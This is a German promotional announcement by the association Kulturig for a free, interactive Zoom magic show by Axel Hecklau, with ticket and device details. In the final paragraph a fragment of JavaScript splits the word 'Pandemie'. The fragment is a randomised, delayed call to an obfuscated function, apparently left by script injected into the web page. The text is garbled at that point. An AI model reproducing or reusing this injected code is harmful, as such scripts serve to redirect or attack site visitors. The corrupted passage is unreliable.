ZAUBEREI – Die Kulturig-Online-Show präsentiert: Das „Kabinett der Kuriositäten“ von Axel Hecklau

Ist Kunst und Kultur in Corona-Zeiten dennoch möglich? JA! Besuchen Sie die Kulturig-Online-Show:

Machen Sie es sich auf Ihrem Sofa zu Hause gemütlich und genießen Sie diese interaktive-Zaubershow in Ihrem Wohnzimmer! Nach der Begrüßung aus dem Cultura Sparkassentheater an der Ems entführt Sie die Kulturig-Online-Show ins „Kabinett der Kuriositäten“ nach Berlin. Dort erwartet Sie Zauber-Vize-Weltmeister Axel Hecklau mit skurrilen Experimenten, optische Illusionen und Zauberkunst vom Feinsten. Hier sitzen Sie garantiert in der ersten Reihe. Egal, ob in Rietberg, Bielefeld oder Rheda- Wiedenbrück, Sie können dem Meister-Magier aus Berlin genau auf die Finger schauen – aber auch den Verlauf der Show beeinflussen und mitmachen. Treten Sie ein in eine wunderbare Welt voller Zauberei, Momenten des Staunens und erleben Sie Geschichten, die nicht einmal das Internet finden kann. Hier verschmelzen die digitale und die analoge Welt zu einem zauberhaften Gesamt-Erlebnis.

Die etwa 60-minütige Show wird über die Plattform „Zoom“ gestreamt und kann über die entsprechende App oder auch im jeweiligen Internetbrowser kostenlos genutzt werden. Alle technischen Infos dazu auch auf www.kulturig.de. Für ein gelungenes Erlebnis empfiehlt es sich, die Show mit einem Desktop PC oder Notebook zu besuchen. Große Tablets reichen ebenfalls aus. Die Verwendung eines Smartphones empfehlen wir nicht. Die Zuschauer benötigen Kamera und Mikrofon, um an der interaktiven Show mitwirken zu können. Zuschauen ist aber auch ohne diese Ausstattung möglich.

Kulturig präsentiert diese außergewöhnliche Show kostenlos und möchte auf diese einfache Weise den Kulturhunger im Lockdown zumindest ein wenig stillen und allen Zuschauern eine Ablenkung vom Corona-Alltag bieten. Die Tickets sind ab sofort über www.kulturig.de erhältlich und gelten für jeweils ein Endgerät. Gerne dürfen Sie weitere Familienmitglieder vor Ihrem Bildschirm versammeln. Der Kulturverein unterstützt mit dieser Show dabei natürlich auch den Künstler, der selbstverständlich eine angemessene Gage erhält und außer online zurzeit nicht auftreten kann. Für seine eigene Kulturarbeit nach und während der Pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andemie freut sich kulturig über Spenden der Zuschauer.

Verpassen Sie nicht dieses besondere und interaktive Online-Erlebnis.

Preis: 0,- € (ein Ticket ist gültig für ein Endgerät)
Tickets und weitere Informationen ab sofort unter: www.kulturig.de

Wann: Samstag, 06.02.2021 Live-Stream 20.00 Uhr